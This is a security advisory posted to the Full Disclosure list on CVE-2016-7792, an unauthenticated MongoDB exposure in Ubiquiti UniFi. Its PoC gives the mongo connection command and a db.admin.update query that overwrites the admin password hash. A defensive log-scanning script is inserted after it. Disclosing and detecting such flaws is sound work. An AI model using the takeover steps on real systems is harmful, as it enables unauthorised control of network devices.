List: full-disclosure
Subject: [FD] Critical Vulnerability in Ubiquiti UniFi
From: Tim Schughart <t.schughart () prosec-networks ! com>
Date: 2016-09-30 9:49:26
Message-ID: 595767868.209491.1475228966431.JavaMail.zimbra () prosec-networks ! com
Hello @all,
Together with my colleague, we found two uncritical vulnerabilities, which you'll find below.
Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.
Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: UniFi 5.2.7; possibly other versions are affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Details:
You are able to connect to the access point's database because of a broken authentication (OWASP Top 10). So you are able to modify the database and read the data. A possible scenario can be found in the PoC section.
Risk:
An attacker gets access to the database and is, for example, able to change the admin's password, as shown in the PoC below.
PoC:
1. Generate SHA512 Hash with e.g.
mkpasswd -m sha-512
2. Connect via network to database, e.g. :
mongo --port 27117 --host target_ip
3. Change the password via the command
db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})
4. Login via web interface with new password
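A defender-side check for the exposure described in this advisory, added here and not part of the original post: the controller's embedded mongod should only ever be reached by the controller itself over loopback, so any "connection accepted" entry in the mongod log from a non-loopback address means the database port (27117, per the advisory) is reachable over the network and in use. The log lines below are constructed samples in the default mongod 3.x log layout; the regex and helper names are this example's own.

```python
import ipaddress
import re
from typing import List, NamedTuple

# Port of the UniFi controller's embedded mongod, taken from the advisory's PoC.
UNIFI_MONGO_PORT = 27117

# Matches a mongod 3.x-style network log line:
#   <timestamp> I NETWORK [<ctx>] connection accepted from <ip>:<port> #<connid> ...
# The greedy \S+ for <ip> backtracks to the last colon, so "::1:51234" yields "::1".
ACCEPT_RE = re.compile(
    r"^(?P<ts>\S+)\s+I\s+NETWORK\s+\[\S+\]\s+connection accepted from "
    r"(?P<ip>\S+):(?P<port>\d+)\s+#(?P<conn>\d+)"
)


class RemoteDbAccess(NamedTuple):
    timestamp: str
    source_ip: str
    conn_id: int


def find_remote_db_connections(log_lines: List[str]) -> List[RemoteDbAccess]:
    """Return every accepted mongod connection whose source is not a loopback address.

    The controller talks to its own database over localhost only, so a remote source
    indicates the unauthenticated database port is exposed and being accessed.
    """
    hits: List[RemoteDbAccess] = []
    for line in log_lines:
        m = ACCEPT_RE.match(line)
        if not m:
            continue  # not a connection-accept event (e.g. "end connection", commands)
        try:
            src = ipaddress.ip_address(m.group("ip"))
        except ValueError:
            continue  # unparseable address: skip rather than guess
        if not src.is_loopback:
            hits.append(RemoteDbAccess(m.group("ts"), str(src), int(m.group("conn"))))
    return hits


# Constructed sample log: one local controller connection, one from a LAN host.
SAMPLE_MONGOD_LOG = [
    "2016-09-30T09:40:01.120+0000 I NETWORK  [initandlisten] connection accepted from 127.0.0.1:48122 #1 (1 connection now open)",
    "2016-09-30T09:41:17.903+0000 I NETWORK  [initandlisten] connection accepted from 10.10.20.55:51234 #2 (2 connections now open)",
    "2016-09-30T09:42:03.511+0000 I NETWORK  [conn2] end connection 10.10.20.55:51234 (1 connection now open)",
]

if __name__ == "__main__":
    for hit in find_remote_db_connections(SAMPLE_MONGOD_LOG):
        print(f"{hit.timestamp} remote access to mongod:{UNIFI_MONGO_PORT} from {hit.source_ip} (conn #{hit.conn_id})")
```

Run it against the controller's mongod log (or feed the same lines to a SIEM rule) and treat every hit as a sign that the database port must be firewalled to localhost.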
Best regards
Tim Schughart
CEO / Managing Director
--
ProSec Networks e.K.
Ellingshohl 82
56077 Koblenz
Website: https://www.prosec-networks.com
E-Mail: t.schughart@prosec.networks.com
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90
"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625."
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/